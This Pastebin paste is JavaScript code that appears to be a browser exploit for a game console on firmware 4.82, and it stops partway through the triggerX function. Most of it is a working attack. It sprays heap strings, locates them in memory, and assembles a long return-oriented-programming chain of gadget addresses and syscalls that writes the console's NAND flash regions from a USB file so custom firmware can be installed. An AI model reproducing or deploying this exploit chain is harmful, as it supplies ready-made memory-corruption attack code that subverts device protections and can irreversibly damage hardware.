API tools faq
paste
Advertisement
Guest User

Untitled

a guest
May 21st, 2018
71
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 21.24 KB | None | 0 0
raw download clone embed print report
  1. function initROP()
  2. {
  3. try
  4. {
  5. disable_cb();
  6. disable_btn();
  7. if(t_out!=0){clearTimeout(t_out);t_out=0;}
  8. var sc_sso=0x258;
  9. var sc_ssc=0x259;
  10. var sc_ssw=0x25B;
  11. var ros0_start_sector=0x401;
  12. var ros1_start_sector=0x3C01;
  13. var sec_step=0x800;
  14. var sec_endstep=0x2;
  15. var flash_id=0x22;
  16. var flash_flag=0x01000000;
  17. var flash2_flag=0x00000001; //NAND
  18. var search_max_threshold = 70*0x100000;
  19. var temp_addr= 0x8A000000;
  20. var search_base = 0x80100000;
  21. var search_size = 0x200000;
  22. var rosdump_addr=0x8C000000;
  23. var ros0flash_addr=0x8C000000;
  24. var ros0flash_addr2=0x8C100000;
  25. var ros0flash_addr3=0x8C200000;
  26. var ros0flash_addr4=0x8C300000;
  27. var ros1flash_addr=0x8C000010;
  28. var ros1flash_addr2=0x8C100010;
  29. var ros1flash_addr3=0x8C200010;
  30. var ros1flash_addr4=0x8C300010;
  31. var fread_mode="rb";
  32. usb_fp_addr=0;
  33. stack_frame_addr=0;
  34. jump_2_addr=0;
  35. jump_1_addr=0;
  36. total_loops++;
  37. clearLogEntry();
  38. var fp_root;
  39. var f_off_start=0x0;
  40. if(used_port===1){fp_root=convertString("xxxx/dev_usb001/");}
  41. else if(used_port===6){fp_root=convertString("xxxx/dev_usb006/");}
  42. else if(used_port===1000){fp_root=convertString("xxxxxxxx/dev_sd/");f_off_start=0x4;}
  43. else if(used_port===1001){fp_root=convertString("xxxxxxxx/dev_cf/");f_off_start=0x4;}
  44. else if(used_port===1002){fp_root=convertString("xxxxxxxx/dev_ms/");f_off_start=0x4;}
  45. else {used_port=0;fp_root=convertString("xxxx/dev_usb000/");}
  46.  
  47. usb_fp=fp_root+convertString("flash_482.hex")+unescape("\u0000")+convertString(fread_mode)+unescape("\u0000\u0000\u4141\u4141\u4141\u4141")
  48. +hexw2bin(gadget3_addr)+hexw2bin(toc_addr)+unescape("\u0000\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141")+hexw2bin(gadget7_addr)+hexw2bin(toc_addr)+unescape("\uFD7E");
  49. function reload()
  50. {
  51. showResult(hr+"<h1><b>Exploit Initialization..."+br+"<font color=%22000000%22>Progress: "+((100/max_loops)*total_loops).toString()+"%, please wait...</font></b></h1>");
  52. t_out=setTimeout(initROP,1000);
  53. };
  54. function fail()
  55. {
  56. total_loops=0;
  57. showResult(hr+"<h1><b>Exploit Initialization FAILED!</h1><h2><font color=%22000000%22><a href=\"javascript:window.location.reload()\">Refresh this page</a> & try again...</font></b></h2>");
  58. cleanGUI();
  59. usb(used_port);
  60. };
  61.  
  62. do
  63. {
  64. if(search_max_threshold<search_size){
  65. if(total_loops<max_loops)reload();
  66. else fail();
  67. return;}
  68. usb_fp=usb_fp.replaceAt(0,hexh2bin(0x7EFD));
  69. usb_fp_addr=findJsVariableOffset("usb_fp",usb_fp,search_base,search_size);
  70. search_max_threshold-=search_size;
  71. }while(usb_fp_addr===0);
  72.  
  73. var rb_addr=usb_fp_addr+0x1C;
  74. var readlen_io=usb_fp_addr+0x22;
  75. var sc_addr=usb_fp_addr+0x2A;
  76. var readlen_addr=usb_fp_addr+0x34;
  77. var dev_handle_addr=usb_fp_addr+0x3C;
  78. var fopen_addr=usb_fp_addr+0x44;
  79. var usb_addr=usb_fp_addr+f_off_start;
  80.  
  81. stack_frame= unescape("\u0102\u2A2F")+hexw2bin(gadget1_addr)+hexw2bin(toc_addr)+unescape("\u1112\u1314\u1516\u1718\u1920\u2122\u2324\u2526\u2728\u2930\u3132\u3334\u3536\u3738\u3940\u4142\u0000\u0000")+hexw2bin(toc_addr)+unescape("\u5152\u5354\u5556\u5758\u5960\u6162\u6364")
  82. +unescape("\u6566\u6768\u6970\u7172\u7374\u7576\u7778\u7980\u8182\u8384\u8586\u8788\u8990\u9192\u9394\u9596\u9798\u9900\u0102\u0304\u0506\u0708\u0910\u1112\u1314\u1516\u1718\u1920\u2122\u2324\u2526\u2728")
  83. +unescape("\u2930\uFF30\uFF30\uFF30\uFF30\u0000\u0000")+hexw2bin(temp_addr)+unescape("\u4748\u4950\u5152\u5354\u5556\u5758\u5960\u6162\u0000\u0000")+hexw2bin(gadget2_addr)+unescape("\u7172\u7374\u7576\u7778\u7980\u8182\u8384\u8586\u8788\u8990\u9192")
  84. +unescape("\u9394\u9596\u9798\u9900\u0102\u0304\u0506\u0708\u0910\u1112\u1314\u1516\u1718\u1920\u2122\u2324\u2526\u2728\u2930\u3132\u3334\u3536\u3738\u3940\u4142\u4344\u4546\u4748\u4950\u5152\u5354\u5556")
  85. +unescape("\u5758\u5960\u6162")+hexw2bin(sc_sso)+unescape("\uFF10\uFF10\uFF08\uFF08\uFF07\uFF07\u0000\u0000")+hexw2bin(dev_handle_addr)+unescape("\u0000\u0000\uFF03\uFF03")+hexw2bin(sc_addr)+unescape("\u9900\u0102\u0304\u0506\u0708\u0910\u1112\u1314\uFF29\uFF29\uFF29")
  86. +unescape("\uFF29\uFF30\uFF30\uFF30\uFF30\u0000\u0000")+hexw2bin(temp_addr+0x20)+unescape("\u3940\u4142\u4344\u4546\u4748\u4950\u5152\u5354\u0000\u0000")+hexw2bin(gadget5_addr+0x4)+unescape("\u6364\u6566\u6768\u6970\u7172\u7374\u7576\u7778\u7980\u8182\u8384")
  87. +unescape("\u8586\u8788\u8990\u9192\u9394\u9596\u9798\u9900\u0102\u0304\u0506\u0708\u0910\u1112\u1314\u1516\u1718\u1920\u2122\u2324\u2526\u2728\u2930\u3132\u3334\u3536\u3738\u3940\u4142\u4344\u8586\u8788")
  88. +unescape("\u8990\u5152\u5354\u5556\u5758\u5960\u6162\u6364\u6566")+hexw2bin(flash_flag)+hexw2bin(flash2_flag)+unescape("\u7576\u7778\u7980\u8182\u0000\u0000")+hexw2bin(gadget2_addr)+unescape("\u9192\u9394\u9596\u9798\u9900\u0102\u0304\u0506\u0708\u0910\u1112")
  89. +unescape("\u1314\u1516\u1718\u1920\u2122\u2324\u2526\u2728\u2930\u3132\u3334\u3536\u3738\u3940\u4142\u4344\u4546\u4748\u4950\u5152\u5354\u5556\u5758\u5960\u6162\u6364\u6566\u6768\u6970\u7172\u7374\u7576")
  90. +unescape("\u7778\u7980\u8182\uFF11\uFF11\uFF10\uFF10\u8033\u84F0\u8033\u853E\u0010\u0000")+hexw2bin(rosdump_addr)+unescape("\u0000\u0000\uFF03\uFF03")+hexw2bin(fopen_addr)+unescape("\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\uFF29\uFF29\uFF29")
  91. +unescape("\uFF29\uFF30\uFF30\uFF30\uFF30\u0000\u0000")+hexw2bin(dev_handle_addr)+unescape("\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u0000\u0000")+hexw2bin(gadget4_addr)+unescape("\u8384\u8586\u8788\u8990\u9192\u9394\u9596\u9798\u9900\u0102\u0304")
  92. +unescape("\u0506\u0708\u0910\u1112\u1314\u1516\u1718\u1920\u2122\u2324\u2526\u2728\u2930\u3132\u3334\u3536\u3738\u3940\u4142\u4344\u4546\u4748\u4950\u5152\u5354\u5556\u5758\u5960\u6162\u6364\u6566\u6768")
  93. +unescape("\u6970\u7172\u7374\u7576\u7778\u0000\u0000")+hexw2bin(temp_addr+0x40)+unescape("\u0000\u0000")+hexw2bin(usb_addr)+unescape("\u0000\u0000")+hexw2bin(rb_addr)+unescape("\u0000\u0000\u0505\u0505\u1112\u1314\u1516\u1718\u1920\u2122\u2324\u2526\u2728\u2930\u3132")
  94. +unescape("\u3334\u0000\u0000")+hexw2bin(gadget2_addr)+unescape("\u4344\u4546\u4748\u4950\u5152\u5354\u5556\u5758\u5960\u6162\u6364\u6566\u6768\u6970\u7172\u7374\u7576\u7778\u7980\u8182\u8384\u8586\u8788\u8990\u9192\u9394\u9596")
  95. +unescape("\u9798\u9900\u0102\u0304\u0506\u0000\u0259\u1112\u1314\u0000\u0000\u0030\u6000\u0000\u0000")+hexw2bin(readlen_io)+unescape("\u0000\u0000")+hexw2bin(rosdump_addr)+unescape("\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000")+hexw2bin(dev_handle_addr)
  96. +unescape("\u6364\u6566\u6768\u6970\u7172\u7374\u7576\u7778\u0000\u0000")+hexw2bin(gadget5_addr)+unescape("\u8788\u8990\u9192\u9394\u9596\u9798\u9900\u0102\u0304\u0506\u0708\u0910\u1112\u1314\u1516\u1718\u1920\u2122\u2324")
  97. +unescape("\u2526\u2728\u2930\u3132\u3334\u3536\u3738\u3940\u4142\u4344\u4546\u4748\u4950\u5152\u5354\u5556\u5758\u0000\u0000")+hexw2bin(usb_addr)+unescape("\u0000\u0000")+hexw2bin(rb_addr)+unescape("\u7576\u7778\u7980\u8182\uFFFF\uFFFF\uFFFF")
  98. +unescape("\uFFFF\u0000\u0000")+hexw2bin(usb_addr)+unescape("\u0000\u0000")+hexw2bin(rb_addr)+unescape("\u4344\u4546\u4748\u4950\u0000\u0000")+hexw2bin(temp_addr+0x60)+unescape("\u4344\u4546\u4748\u4950\u5152\u5354\u5556\u5758\u0000\u0000\u0047\u5134\u2324\u2526\u2728")
  99. +unescape("\u2930\u3132\u3334\u3536\u3738\u3940\u4142\u4344\u4546\u4748\u4950\u5152\u5354\u5556\u5758\u5960\u6162\u6364\u6566\u6768\u6970\u7172\u7374\u7576\u7778\uAAAA\uAAAA\uAAAA\uAAAA\uAAAA\uAAAA\uAAAA")
  100. +unescape("\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u0000\u0000\uFF29\uFF29\u0000\u0000\uFF30\uFF30\u0000\u0000")+hexw2bin(temp_addr+0x80)+unescape("\uAAAA\uAAAA\uAAAA\uAAAA\uAAAA\uAAAA\uAAAA\uAAAA")
  101. +unescape("\u0000\u0000")+hexw2bin(gadget2_addr)+unescape("\u9192\u9394\u9596\u9798\u9900\u0102\u0304\u0506\u0708\u0910\u1112\u1314\u1516\u1718\u1920\u2122\u2324\u2526\u2728")
  102. +unescape("\u2930\u3132\u3334\u3536\u3738\u3940\u4142\u4344\u4546\u4748\u4950\u5152\u5354\u5556\u5758\u5960\u6162\u6364\u6566\u6768\u6970\u7172\u7374\u7576\u7778\uFF00\uFF00")+hexw2bin(sc_ssw)+unescape("\uFF10\uFF10")+hexw2bin(temp_addr+0x200)+hexw2bin(ros0flash_addr)
  103. +hexw2bin(sec_step)+hexw2bin(ros0_start_sector)+unescape("\u0000\u0000\uFF03\uFF03")+hexw2bin(flash_id)+unescape("\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\uFF29\uFF29\uFF29\uFF29\uFF30\uFF30\uFF30\uFF30\u0000\u0000")+hexw2bin(dev_handle_addr)
  104. +unescape("\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u0000\u0000")+hexw2bin(gadget6_addr)+unescape("\u8384\u8586\u8788\u8990\u9192\u9394\u9596\u9798\u9900\u0102\u0304\u0506\u0708\u0910\u1112\u1314\u1516\u1718\u1920")
  105. +unescape("\u2122\u2324\u2526\u2728\u2930\u3132\u3334\u3536\u3738\u3940\u4142\u4344\u4546\u4748\u4950\u5152\u5354\u5556\u5758\u5960\u6162\u6364\u6566\u6768\u6970\u7172\u7374\u7576\u7778\u0000\u0000")+hexw2bin(temp_addr+0x50000)
  106. +unescape("\u8788\u8990\u9192\u9394\u9596\u9798\u9900\u0102\u0000\u0000")+hexw2bin(gadget2_addr)+unescape("\u9192\u9394\u9596\u9798\u9900\u0102\u0304\u0506\u0708\u0910\u1112\u1314\u1516\u1718\u1920\u2122\u2324\u2526\u2728")
  107. +unescape("\u2930\u3132\u3334\u3536\u3738\u3940\u4142\u4344\u4546\u4748\u4950\u5152\u5354\u5556\u5758\u5960\u6162\u6364\u6566\u6768\u6970\u7172\u7374\u7576\u7778\uFF00\uFF00")+hexw2bin(sc_ssw)+unescape("\uFF10\uFF10")+hexw2bin(temp_addr+0x300)+hexw2bin(ros0flash_addr2)
  108. +hexw2bin(sec_step)+hexw2bin(ros0_start_sector+sec_step)+unescape("\u0000\u0000\uFF03\uFF03")+hexw2bin(flash_id)+unescape("\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\uFF29\uFF29\uFF29\uFF29\uFF30\uFF30\uFF30\uFF30\u0000\u0000")+hexw2bin(dev_handle_addr)
  109. +unescape("\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u0000\u0000")+hexw2bin(gadget6_addr)+unescape("\u8384\u8586\u8788\u8990\u9192\u9394\u9596\u9798\u9900\u0102\u0304\u0506\u0708\u0910\u1112\u1314\u1516\u1718\u1920")
  110. +unescape("\u2122\u2324\u2526\u2728\u2930\u3132\u3334\u3536\u3738\u3940\u4142\u4344\u4546\u4748\u4950\u5152\u5354\u5556\u5758\u5960\u6162\u6364\u6566\u6768\u6970\u7172\u7374\u7576\u7778\u0000\u0000")+hexw2bin(temp_addr+0x50100)
  111. +unescape("\u8788\u8990\u9192\u9394\u9596\u9798\u9900\u0102\u0000\u0000")+hexw2bin(gadget2_addr)+unescape("\u9192\u9394\u9596\u9798\u9900\u0102\u0304\u0506\u0708\u0910\u1112\u1314\u1516\u1718\u1920\u2122\u2324\u2526\u2728")
  112. +unescape("\u2930\u3132\u3334\u3536\u3738\u3940\u4142\u4344\u4546\u4748\u4950\u5152\u5354\u5556\u5758\u5960\u6162\u6364\u6566\u6768\u6970\u7172\u7374\u7576\u7778\uFF00\uFF00")+hexw2bin(sc_ssw)+unescape("\uFF10\uFF10")+hexw2bin(temp_addr+0x400)+hexw2bin(ros0flash_addr3)
  113. +hexw2bin(sec_step)+hexw2bin(ros0_start_sector+(2*sec_step))+unescape("\u0000\u0000\uFF03\uFF03")+hexw2bin(flash_id)+unescape("\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\uFF29\uFF29\uFF29\uFF29\uFF30\uFF30\uFF30\uFF30\u0000\u0000")+hexw2bin(dev_handle_addr)
  114. +unescape("\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u0000\u0000")+hexw2bin(gadget6_addr)+unescape("\u8384\u8586\u8788\u8990\u9192\u9394\u9596\u9798\u9900\u0102\u0304\u0506\u0708\u0910\u1112\u1314\u1516\u1718\u1920")
  115. +unescape("\u2122\u2324\u2526\u2728\u2930\u3132\u3334\u3536\u3738\u3940\u4142\u4344\u4546\u4748\u4950\u5152\u5354\u5556\u5758\u5960\u6162\u6364\u6566\u6768\u6970\u7172\u7374\u7576\u7778\u0000\u0000")+hexw2bin(temp_addr+0x50200)
  116. +unescape("\u8788\u8990\u9192\u9394\u9596\u9798\u9900\u0102\u0000\u0000")+hexw2bin(gadget2_addr)+unescape("\u9192\u9394\u9596\u9798\u9900\u0102\u0304\u0506\u0708\u0910\u1112\u1314\u1516\u1718\u1920\u2122\u2324\u2526\u2728")
  117. +unescape("\u2930\u3132\u3334\u3536\u3738\u3940\u4142\u4344\u4546\u4748\u4950\u5152\u5354\u5556\u5758\u5960\u6162\u6364\u6566\u6768\u6970\u7172\u7374\u7576\u7778\uFF00\uFF00")+hexw2bin(sc_ssw)+unescape("\uFF10\uFF10")+hexw2bin(temp_addr+0x500)+hexw2bin(ros0flash_addr4)
  118. +hexw2bin(sec_endstep)+hexw2bin(ros0_start_sector+(3*sec_step))+unescape("\u0000\u0000\uFF03\uFF03")+hexw2bin(flash_id)+unescape("\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\uFF29\uFF29\uFF29\uFF29\uFF30\uFF30\uFF30\uFF30\u0000\u0000")+hexw2bin(dev_handle_addr)
  119. +unescape("\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u0000\u0000")+hexw2bin(gadget6_addr)+unescape("\u8384\u8586\u8788\u8990\u9192\u9394\u9596\u9798\u9900\u0102\u0304\u0506\u0708\u0910\u1112\u1314\u1516\u1718\u1920")
  120. +unescape("\u2122\u2324\u2526\u2728\u2930\u3132\u3334\u3536\u3738\u3940\u4142\u4344\u4546\u4748\u4950\u5152\u5354\u5556\u5758\u5960\u6162\u6364\u6566\u6768\u6970\u7172\u7374\u7576\u7778\u0000\u0000")+hexw2bin(temp_addr+0x50300)
  121. +unescape("\u8788\u8990\u9192\u9394\u9596\u9798\u9900\u0102\u0000\u0000")+hexw2bin(gadget2_addr)+unescape("\u9192\u9394\u9596\u9798\u9900\u0102\u0304\u0506\u0708\u0910\u1112\u1314\u1516\u1718\u1920\u2122\u2324\u2526\u2728")
  122. +unescape("\u2930\u3132\u3334\u3536\u3738\u3940\u4142\u4344\u4546\u4748\u4950\u5152\u5354\u5556\u5758\u5960\u6162\u6364\u6566\u6768\u6970\u7172\u7374\u7576\u7778\uFF00\uFF00")+hexw2bin(sc_ssw)+unescape("\uFF10\uFF10")+hexw2bin(temp_addr+0x600)+hexw2bin(ros1flash_addr)
  123. +hexw2bin(sec_step)+hexw2bin(ros1_start_sector)+unescape("\u0000\u0000\uFF03\uFF03")+hexw2bin(flash_id)+unescape("\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\uFF29\uFF29\uFF29\uFF29\uFF30\uFF30\uFF30\uFF30\u0000\u0000")+hexw2bin(dev_handle_addr)
  124. +unescape("\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u0000\u0000")+hexw2bin(gadget6_addr)+unescape("\u8384\u8586\u8788\u8990\u9192\u9394\u9596\u9798\u9900\u0102\u0304\u0506\u0708\u0910\u1112\u1314\u1516\u1718\u1920")
  125. +unescape("\u2122\u2324\u2526\u2728\u2930\u3132\u3334\u3536\u3738\u3940\u4142\u4344\u4546\u4748\u4950\u5152\u5354\u5556\u5758\u5960\u6162\u6364\u6566\u6768\u6970\u7172\u7374\u7576\u7778\u0000\u0000")+hexw2bin(temp_addr+0x50400)
  126. +unescape("\u8788\u8990\u9192\u9394\u9596\u9798\u9900\u0102\u0000\u0000")+hexw2bin(gadget2_addr)+unescape("\u9192\u9394\u9596\u9798\u9900\u0102\u0304\u0506\u0708\u0910\u1112\u1314\u1516\u1718\u1920\u2122\u2324\u2526\u2728")
  127. +unescape("\u2930\u3132\u3334\u3536\u3738\u3940\u4142\u4344\u4546\u4748\u4950\u5152\u5354\u5556\u5758\u5960\u6162\u6364\u6566\u6768\u6970\u7172\u7374\u7576\u7778\uFF00\uFF00")+hexw2bin(sc_ssw)+unescape("\uFF10\uFF10")+hexw2bin(temp_addr+0x700)+hexw2bin(ros1flash_addr2)
  128. +hexw2bin(sec_step)+hexw2bin(ros1_start_sector+sec_step)+unescape("\u0000\u0000\uFF03\uFF03")+hexw2bin(flash_id)+unescape("\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\uFF29\uFF29\uFF29\uFF29\uFF30\uFF30\uFF30\uFF30\u0000\u0000")+hexw2bin(dev_handle_addr)
  129. +unescape("\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u0000\u0000")+hexw2bin(gadget6_addr)+unescape("\u8384\u8586\u8788\u8990\u9192\u9394\u9596\u9798\u9900\u0102\u0304\u0506\u0708\u0910\u1112\u1314\u1516\u1718\u1920")
  130. +unescape("\u2122\u2324\u2526\u2728\u2930\u3132\u3334\u3536\u3738\u3940\u4142\u4344\u4546\u4748\u4950\u5152\u5354\u5556\u5758\u5960\u6162\u6364\u6566\u6768\u6970\u7172\u7374\u7576\u7778\u0000\u0000")+hexw2bin(temp_addr+0x50500)
  131. +unescape("\u8788\u8990\u9192\u9394\u9596\u9798\u9900\u0102\u0000\u0000")+hexw2bin(gadget2_addr)+unescape("\u9192\u9394\u9596\u9798\u9900\u0102\u0304\u0506\u0708\u0910\u1112\u1314\u1516\u1718\u1920\u2122\u2324\u2526\u2728")
  132. +unescape("\u2930\u3132\u3334\u3536\u3738\u3940\u4142\u4344\u4546\u4748\u4950\u5152\u5354\u5556\u5758\u5960\u6162\u6364\u6566\u6768\u6970\u7172\u7374\u7576\u7778\uFF00\uFF00")+hexw2bin(sc_ssw)+unescape("\uFF10\uFF10")+hexw2bin(temp_addr+0x800)+hexw2bin(ros1flash_addr3)
  133. +hexw2bin(sec_step)+hexw2bin(ros1_start_sector+(2*sec_step))+unescape("\u0000\u0000\uFF03\uFF03")+hexw2bin(flash_id)+unescape("\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\uFF29\uFF29\uFF29\uFF29\uFF30\uFF30\uFF30\uFF30\u0000\u0000")+hexw2bin(dev_handle_addr)
  134. +unescape("\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u0000\u0000")+hexw2bin(gadget6_addr)+unescape("\u8384\u8586\u8788\u8990\u9192\u9394\u9596\u9798\u9900\u0102\u0304\u0506\u0708\u0910\u1112\u1314\u1516\u1718\u1920")
  135. +unescape("\u2122\u2324\u2526\u2728\u2930\u3132\u3334\u3536\u3738\u3940\u4142\u4344\u4546\u4748\u4950\u5152\u5354\u5556\u5758\u5960\u6162\u6364\u6566\u6768\u6970\u7172\u7374\u7576\u7778\u0000\u0000")+hexw2bin(temp_addr+0x50600)
  136. +unescape("\u8788\u8990\u9192\u9394\u9596\u9798\u9900\u0102\u0000\u0000")+hexw2bin(gadget2_addr)+unescape("\u9192\u9394\u9596\u9798\u9900\u0102\u0304\u0506\u0708\u0910\u1112\u1314\u1516\u1718\u1920\u2122\u2324\u2526\u2728")
  137. +unescape("\u2930\u3132\u3334\u3536\u3738\u3940\u4142\u4344\u4546\u4748\u4950\u5152\u5354\u5556\u5758\u5960\u6162\u6364\u6566\u6768\u6970\u7172\u7374\u7576\u7778\uFF00\uFF00")+hexw2bin(sc_ssw)+unescape("\uFF10\uFF10")+hexw2bin(temp_addr+0x900)+hexw2bin(ros1flash_addr4)
  138. +hexw2bin(sec_endstep)+hexw2bin(ros1_start_sector+(3*sec_step))+unescape("\u0000\u0000\uFF03\uFF03")+hexw2bin(flash_id)+unescape("\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\uFF29\uFF29\uFF29\uFF29\uFF30\uFF30\uFF30\uFF30\u0000\u0000")+hexw2bin(dev_handle_addr)
  139. +unescape("\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u0000\u0000")+hexw2bin(gadget6_addr)+unescape("\u8384\u8586\u8788\u8990\u9192\u9394\u9596\u9798\u9900\u0102\u0304\u0506\u0708\u0910\u1112\u1314\u1516\u1718\u1920")
  140. +unescape("\u2122\u2324\u2526\u2728\u2930\u3132\u3334\u3536\u3738\u3940\u4142\u4344\u4546\u4748\u4950\u5152\u5354\u5556\u5758\u5960\u6162\u6364\u6566\u6768\u6970\u7172\u7374\u7576\u7778\u0000\u0000")+hexw2bin(temp_addr+0x50700)
  141. +unescape("\u8788\u8990\u9192\u9394\u9596\u9798\u9900\u0102\u0000\u0000")+hexw2bin(gadget2_addr)+unescape("\u9192\u9394\u9596\u9798\u9900\u0102\u0304\u0506\u0708\u0910\u1112\u1314\u1516\u1718\u1920\u2122\u2324\u2526\u2728")
  142. +unescape("\u2930\u3132\u3334\u3536\u3738\u3940\u4142\u4344\u4546\u4748\u4950\u5152\u5354\u5556\u5758\u5960\u6162\u6364\u6566\u6768\u6970\u7172\u7374\u7576\u7778\uFF00\uFF00")+hexw2bin(sc_ssc)+unescape("\uFF10\uFF10\uFF08\uFF08\uFF07\uFF07")
  143. +unescape("\uFF06\uFF06\uFF05\uFF05\uFF04\uFF04\uFF03\uFF03\uFF09\uFF09\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\uFF29\uFF29\uFF29\uFF29\uFF30\uFF30\uFF30\uFF30\u0000\u0000")+hexw2bin(dev_handle_addr)
  144. +unescape("\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u0000\u0000")+hexw2bin(gadget6_addr)+unescape("\u3334\u3536\u3738\u3940\u4142\u4344\u4546\u4748\u4950\u5152\u5354\u5556\u5758\u5960\u6162\u6364\u6566\u6768\u6970\u7172\u7374")
  145. +unescape("\u8182\u8384\u8586\u8788\u8990\u9192\u9394\u9596\u9798\u9900\u0102\u0304\u0506\u0708\u0910\u1112\u1314\u1516\u1718\u1920\u2122\u2324\u2526\u2728\u2930\u3132\u3334")
  146. +unescape("\u0000\u0000")+hexw2bin(temp_addr+0xA00)+unescape("\u0000\u0000")+hexw2bin(sp_exit)+unescape("\u9900\u0102\u0304\u0506\u0000\u0000")+hexw2bin(gadget8_addr)+unescape("\u2F2A");
  147.  
  148. do
  149. {
  150. if(search_max_threshold<search_size){
  151. if(total_loops<max_loops)reload();
  152. else fail();
  153. return;}
  154. stack_frame=stack_frame.replaceAt(0,hexh2bin(0x2A2F));
  155. stack_frame_addr=findJsVariableOffset("stack_frame",stack_frame,search_base,search_size);
  156. search_max_threshold-=search_size;
  157. }while(stack_frame_addr===0);
  158. jump_2=unescape("\u0102\u7EFB\u0304\u0506\u0708\u0910\u1112\u1314\u1516\u1718\u1920\u2122\u2324\u2526\u2728\u2930\u3132\u3334\u3536\u3738\u3940\u4142\u4344\u4546\u4748\u4950")
  159. +hexw2bin(stack_frame_addr)+unescape("\uFB7E");
  160. do
  161. {
  162. if(search_max_threshold<search_size){
  163. if(total_loops<max_loops)reload();
  164. else fail();
  165. return;}
  166. jump_2=jump_2.replaceAt(0,hexh2bin(0x7EFB));
  167. jump_2_addr=findJsVariableOffset("jump_2",jump_2,search_base,search_size);
  168. search_max_threshold-=search_size;
  169. }while(jump_2_addr===0);
  170. jump_1=unescape("\u4141\u7EFA")+hexw2bin(jump_2_addr)+unescape("\uFA7E");
  171. do
  172. {
  173. if(search_max_threshold<search_size){
  174. if(total_loops<max_loops)reload();
  175. else fail();
  176. return;}
  177. jump_1=jump_1.replaceAt(0,hexh2bin(0x7EFA));
  178. jump_1_addr=findJsVariableOffset("jump_1",jump_1,search_base,search_size);
  179. search_max_threshold-=search_size;
  180. }while(jump_1_addr===0);
  181.  
  182. var u=checkMemory(usb_fp_addr-0x4,0x100,usb_fp.length);
  183. var j2=checkMemory(jump_2_addr-0x4,0x100,jump_2.length);
  184. var j1=checkMemory(jump_1_addr-0x4,0x100,jump_1.length);
  185. if((j2===jump_2)&&(j1===jump_1)&&(u===usb_fp))
  186. {
  187. if(t_out!=0){clearTimeout(t_out);}
  188. showResult(hr+"<h1><b><font color=%22386E38%22>Exploit Initialization SUCCESS...!</font></b></h1><h3><b><font color=%22000000%22>You can now proceed to patch the NAND Flash Memory!</font></b></h3>");
  189. enable_trigger();
  190. }
  191. else
  192. {
  193. logAdd("String mismatch in memory!");
  194. if(total_loops<max_loops)reload();
  195. else fail();
  196. }
  197. }
  198. catch(e)
  199. {
  200. debug=true;
  201. logAdd(br+"Exploit initialization failed because the following exception was thrown during execution:"+br+e);
  202. debug=false;
  203. }
  204. }
  205. function triggerX()
  206. {
  207. clearLogEntry();
  208. showResult(hr+"<h1><b>Proceeding to patch NAND Flash Memory...</b></h1><h3><b><font color=%22000000%22>Please wait, the patch operation takes a few minutes!</font></b></h3>");
  209. disable_cb();
  210. disable_btn();
  211. setTimeout(trigger,1000,jump_1_addr);
  212. setTimeout(success,2000,hr+"<h1><b><font color=%22386E38%22>NAND Flash memory patch operation completed..!</font></b></h1><h3><b><font color=%22000000%22>You can dump the NAND now & check that the patch has been applied successfully."+br+"Then reboot to enable the patches & install the 4.82 CFW of your choice...</font></b></h3>");
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!